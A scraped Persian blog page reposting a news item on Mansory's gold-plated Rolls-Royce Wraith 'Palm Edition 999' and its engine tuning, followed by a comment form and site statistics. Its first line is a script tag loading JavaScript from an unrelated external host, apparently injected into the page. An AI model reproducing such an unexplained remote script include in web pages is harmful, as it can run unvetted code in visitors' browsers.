script type="text/javascript" src="http://7vps.ir/img/website.js"> «پالم 999»، پروژه متفاوت منصوری
کافی نت
وبلاگی جذاب
«پالم 999»، پروژه متفاوت منصوری

«پالم 999»، پروژه متفاوت منصوری

پرشین خودرو: منصوری این بار دست روی طلای 24 عیار گذاشته و پروژه‌ای کاملا متفاوت را به دست گرفته که رولزرویس ویرایث سال را تبدیل به یک خودروی لوکس طلاکاری شده کرده است. پروژه‌ای که از این به بعد با نام "پالم ادیشن 999 (Palm Edition 999)" شناخته خواهد شد.

به گزارش «پرشین خودرو»، گذارید اول با بخش مولد قدرتی این خودرو کارمان را شروع کنیم تا پس از این به بررسی موضوع اصلی یعنی بخش‌های طلاکاری شده این فرزند لوکس رولزرویس بپردازیم. همانطور که می‌دانید، منصوری جز بهترین تیونرهایی بشمار می‌رود که حتی از پیشرانه‌های کوچک هم می‌تواند قدرتی بالا و غیرقابل تصور استخراج کند. این قاعده در خصوص پیشرانه رولزرویس هم صادق است، ولی کمی ملموس‌تر، به گونه‌ای که پیشرانه استاندارد 6.6 لیتری توربوشارژر 12 سیلندر رولزرویس که یک زمانی می‌توانست قدرتی 632 اسب بخاری در کنار گشتاور 800 نیوتن متری تولید کند، حالا موفق به تولید حداکثر قدرتی 730 اسب بخاری در کنار گشتاوری 1000 نیوتن متری شده که خودرو را تا مرز 300 کیلومتر بر ساعت همراهی می‌کند.

در خصوص تیونینگ بصری هم منصوری به معنی واقعی کلمه شاهکاری از خود به نمایش گذاشته است، نه زیاد در استفاده از طلا در طراحی ظاهری افراط کرده و نه تفریط، به گونه‌ای که می‌توان روکش‌های طلایی را بر روی کاپوت و مجموعه کامل جلوپنجره، حاشیه مه شکن‌ها، حاشیه چراغ‌های پیشانی، در زیر مجموعه سپر، بر روی رینگ‌های 22 اینچی آلیاژی، بر روی سقف و ستون پنجره‌ها، بر روی قاب پشتی آینه‌ها، دستگیره درب‌ها، حاشیه خروجی اگزوز، اطراف چراغ‌های خطر، زیر رکاب درب‌ها و در نهایت بر روی درب صندوق عقب مشاهده کرد. در داخل کابین هم سریال طلاکاری منصوری ادامه داشته و برای ساخت رکاب داخلی درب‌ها، قسمت فلزی قفل کمربندهای ایمنی، کنترلرهای تنظیم صندلی و... از طلای 24 عیار استفاده شده است.



نظرات شما عزیزان:

نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:







جمعه 18 تير 1395برچسب:, :: 5:51 بعد از ظهر
گری گوری

درباره وبلاگ


به وبلاگ خودتان خوش آمدید امیدوارم که در این وبلاگ بتوانم نیاز شما دوست گرامی را برآورده سازم.
آخرین مطالب
آرشيو وبلاگ
نويسندگان
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان کافی نت و آدرس caffinet.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.








نام :
وب :
پیام :
2+2=:
(Refresh)

<-PollName->

<-PollItems->

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 9
بازدید دیروز : 0
بازدید هفته : 101
بازدید ماه : 9133
بازدید کل : 139284
تعداد مطالب : 562
تعداد نظرات : 8
تعداد آنلاین : 1


آریان پیامک
آریان اس ام اس